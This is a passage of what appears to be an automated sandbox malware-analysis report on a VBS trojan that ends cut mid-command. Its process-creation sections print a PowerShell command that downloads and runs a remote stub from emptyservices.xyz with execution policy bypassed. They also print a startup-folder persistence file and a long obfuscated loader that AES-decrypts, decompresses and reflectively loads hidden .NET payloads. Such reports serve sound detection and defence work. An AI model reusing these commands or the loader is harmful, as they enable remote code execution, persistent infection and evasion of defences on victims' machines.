Source: Binary string: \??\Z:\syscalls\amsi64_7184.amsi.csve.pdb(V source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb.s source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbT source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbq source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb? source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbZ] source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbF source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer320805 source: powershell.exe, 00000014.00000002.2491608753.000001F39452D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdby source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbs% source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb189>K source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb29; source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer3281dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbf source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 3.78.28.71 ports 13094,0,1,3,4,9
Performs DNS queries to domains with low reputation
Source: DNS query: emptyservices.xyz
Source: global trafficTCP traffic: 192.168.2.4:49846 -> 3.78.28.71:13094
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: emptyservices.xyz
Source: global trafficDNS traffic detected: DNS query: 0.tcp.eu.ngrok.io
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1742529866.000001D081341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://emptyservices.xyz
Source: powershell.exe, 00000003.00000002.1742529866.000001D081778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://emptyservices.xyz/stub
Source: powershell.exe, 00000003.00000002.1764714970.000001D0F58A4000.00000004.00000020.00020000.00000000.sdmp, 7299_output.vbsString found in binary or memory: https://emptyservices.xyz/stub.txt
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1742529866.000001D080C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C48D2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD92A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAB6D8013_2_00007FFD9BAB6D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BABCA9013_2_00007FFD9BABCA90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BABCA3513_2_00007FFD9BABCA35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BABC93B13_2_00007FFD9BABC93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BABEDE013_2_00007FFD9BABEDE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BACDD8013_2_00007FFD9BACDD80
Source: 7299_output.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2232
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2232
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2175Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2232Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2232Jump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@46/24@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmdJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\sY4aS2sV71cBiQtZ
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\c.batJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object 